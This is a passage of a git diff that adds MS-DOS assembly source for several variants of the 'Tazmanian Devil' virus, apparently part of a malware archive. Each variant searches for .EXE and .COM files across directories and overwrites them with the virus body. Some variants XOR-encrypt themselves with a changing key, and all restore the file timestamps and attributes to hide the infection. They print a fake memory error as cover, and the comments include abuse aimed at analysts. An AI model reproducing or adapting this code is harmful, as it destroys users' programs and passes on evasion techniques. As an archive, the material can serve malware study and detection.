extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,5 ; Are at least 5 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + mov dx,offset virus_msg5 + int 21h + mov dx,offset virus_msg6 + int 21h + mov dx,offset virus_msg7 + int 21h + mov dx,offset virus_msg8 + int 21h + mov dx,offset virus_msg9 + int 21h + mov dx,offset virus_msg10 + int 21h + mov dx,offset virus_msg11 + int 21h + mov dx,offset virus_msg12 + int 21h + mov dx,offset virus_msg13 + int 21h + mov dx,offset virus_msg14 + int 21h + mov dx,offset virus_msg15 + int 21h + mov dx,offset virus_msg16 + int 21h + mov dx,offset virus_msg17 + int 21h + mov dx,offset virus_msg18 + int 21h + mov dx,offset virus_msg19 + int 21h + mov dx,offset virus_msg20 + int 21h + mov dx,offset virus_msg21 + int 21h + mov dx,offset virus_msg22 + int 21h + mov dx,offset virus_msg23 + int 21h + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +; filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.taz-2197.asm b/MSDOS/Virus.MSDOS.Unknown.taz-2197.asm new file mode 100644 index 00000000..43533b00 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taz-2197.asm @@ -0,0 +1,276 @@ +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +virus_size equ 2197 ; Size of the virus file +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". +; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + +encrypt_val db 00h ; Hold value to encrypt by here + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the virus code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov ah,[bx] ; Get the current byte + xor ah,encrypt_val ; Engage/disengage XOR scheme on it + mov [bx],ah ; Put it back where we got it + inc bx ; Move BX ahead a byte + cmp bx,offset virus_code+virus_size ; Are we at the end? + jle xor_loop ; If not, do another cycle + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. +;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. +;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Program too big to fit in memory$" +virus_msg1 db cr," $" +virus_msg2 db cr," $" +virus_msg3 db cr," $" +virus_msg4 db cr," $" +virus_msg5 db cr," $" +virus_msg6 db cr," $" +virus_msg7 db cr," $" +virus_msg8 db cr," $" +virus_msg9 db cr," $" +virus_msg10 db cr," $" +virus_msg11 db cr," $" +virus_msg12 db cr," $" +virus_msg13 db cr," $" +virus_msg14 db cr," $" +virus_msg15 db cr," $" +virus_msg16 db cr," $" +virus_msg17 db cr," $" +virus_msg18 db cr," $" +virus_msg19 db cr," $" +virus_msg20 db cr," $" +virus_msg21 db cr," $" +virus_msg22 db cr,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,6 ; Are at least 6 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + mov dx,offset virus_msg5 + int 21h + mov dx,offset virus_msg6 + int 21h + mov dx,offset virus_msg7 + int 21h + mov dx,offset virus_msg8 + int 21h + mov dx,offset virus_msg9 + int 21h + mov dx,offset virus_msg10 + int 21h + mov dx,offset virus_msg11 + int 21h + mov dx,offset virus_msg12 + int 21h + mov dx,offset virus_msg13 + int 21h + mov dx,offset virus_msg14 + int 21h + mov dx,offset virus_msg15 + int 21h + mov dx,offset virus_msg16 + int 21h + mov dx,offset virus_msg17 + int 21h + mov dx,offset virus_msg18 + int 21h + mov dx,offset virus_msg19 + int 21h + mov dx,offset virus_msg20 + int 21h + mov dx,offset virus_msg21 + int 21h + mov dx,offset virus_msg22 + int 21h + + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.taz-2208.asm b/MSDOS/Virus.MSDOS.Unknown.taz-2208.asm new file mode 100644 index 00000000..cb25df2e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taz-2208.asm @@ -0,0 +1,240 @@ +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +virus_size equ 562 ; Size of the virus file +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +main proc near ; Code execution begins here + jmp random_mutation ; Put the virus into action + +encrypt_val db 00h ; Hold value to encrypt by here + +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + pop bx ; Get back the handle + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + ret ; Go back to where you came from + + +virus_code: +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$" +virus_msg1 db cr,lf,tab," $" +virus_msg2 db cr,lf,tab," $" +virus_msg3 db cr,lf,tab," $" +virus_msg4 db cr,lf,tab," $" +virus_msg5 db cr,lf,tab," $" +virus_msg6 db cr,lf,tab," $" +virus_msg7 db cr,lf,tab," $" +virus_msg8 db cr,lf,tab," $" +virus_msg9 db cr,lf,tab," $" +virus_msg10 db cr,lf,tab," $" +virus_msg11 db cr,lf,tab," $" +virus_msg12 db cr,lf,tab," $" +virus_msg13 db cr,lf,tab," $" +virus_msg14 db cr,lf,tab," $" +virus_msg15 db cr,lf,tab," $" +virus_msg16 db cr,lf,tab," $" +virus_msg17 db cr,lf,tab," $" +virus_msg18 db cr,lf,tab," $" +virus_msg19 db cr,lf,tab," $" +virus_msg20 db cr,lf,tab," $" +virus_msg21 db cr,lf,tab," $" +virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,16 ; Are at least 16 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + mov dx,offset virus_msg5 + int 21h + mov dx,offset virus_msg6 + int 21h + mov dx,offset virus_msg7 + int 21h + mov dx,offset virus_msg8 + int 21h + mov dx,offset virus_msg9 + int 21h + mov dx,offset virus_msg10 + int 21h + mov dx,offset virus_msg11 + int 21h + mov dx,offset virus_msg12 + int 21h + mov dx,offset virus_msg13 + int 21h + mov dx,offset virus_msg14 + int 21h + mov dx,offset virus_msg15 + int 21h + mov dx,offset virus_msg16 + int 21h + mov dx,offset virus_msg17 + int 21h + mov dx,offset virus_msg18 + int 21h + mov dx,offset virus_msg19 + int 21h + mov dx,offset virus_msg20 + int 21h +jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.taz-2209.asm b/MSDOS/Virus.MSDOS.Unknown.taz-2209.asm new file mode 100644 index 00000000..65d6b07a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taz-2209.asm @@ -0,0 +1,238 @@ +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +virus_size equ 2209 ; Size of the virus file +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +main proc near ; Code execution begins here + jmp random_mutation ; Put the virus into action + +encrypt_val db 00h ; Hold value to encrypt by here + +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + pop bx ; Get back the handle + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + ret ; Go back to where you came from + + +virus_code: +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$" +virus_msg1 db cr,lf,tab," $" +virus_msg2 db cr,lf,tab," $" +virus_msg3 db cr,lf,tab," $" +virus_msg4 db cr,lf,tab," $" +virus_msg5 db cr,lf,tab," $" +virus_msg6 db cr,lf,tab," $" +virus_msg7 db cr,lf,tab," $" +virus_msg8 db cr,lf,tab," $" +virus_msg9 db cr,lf,tab," $" +virus_msg10 db cr,lf,tab," $" +virus_msg11 db cr,lf,tab," $" +virus_msg12 db cr,lf,tab," $" +virus_msg13 db cr,lf,tab," $" +virus_msg14 db cr,lf,tab," $" +virus_msg15 db cr,lf,tab," $" +virus_msg16 db cr,lf,tab," $" +virus_msg17 db cr,lf,tab," $" +virus_msg18 db cr,lf,tab," $" +virus_msg19 db cr,lf,tab," $" +virus_msg20 db cr,lf,tab," $" +virus_msg21 db cr,lf,tab," $" +virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,30 ; Is it less than 30 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,2 ; Are at least 2 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + mov dx,offset virus_msg5 + int 21h + mov dx,offset virus_msg6 + int 21h + mov dx,offset virus_msg7 + int 21h + mov dx,offset virus_msg8 + int 21h + mov dx,offset virus_msg9 + int 21h + mov dx,offset virus_msg10 + int 21h + mov dx,offset virus_msg11 + int 21h + mov dx,offset virus_msg12 + int 21h + mov dx,offset virus_msg13 + int 21h + mov dx,offset virus_msg14 + int 21h + mov dx,offset virus_msg15 + int 21h + mov dx,offset virus_msg16 + int 21h + mov dx,offset virus_msg17 + int 21h + mov dx,offset virus_msg18 + int 21h + mov dx,offset virus_msg19 + int 21h + mov dx,offset virus_msg20 + int 21h +jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +main endp +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.taz-2276.asm b/MSDOS/Virus.MSDOS.Unknown.taz-2276.asm new file mode 100644 index 00000000..dd923786 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taz-2276.asm @@ -0,0 +1,278 @@ +cr equ 13 ; This VIRUS was written 12-14-1992 +lf equ 10 ; AND QUIT READING MY SOURCE CODE +tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG +virus_size equ 2276 ; QUEERBAIT VIRUS TRACKER WANNA-BE! +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". +; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + +encrypt_val db 00h ; Hold value to encrypt by here + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the virus code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov ah,[bx] ; Get the current byte + xor ah,encrypt_val ; Engage/disengage XOR scheme on it + mov [bx],ah ; Put it back where we got it + inc bx ; Move BX ahead a byte + cmp bx,offset virus_code+virus_size ; Are we at the end? + jle xor_loop ; If not, do another cycle + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. +;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. 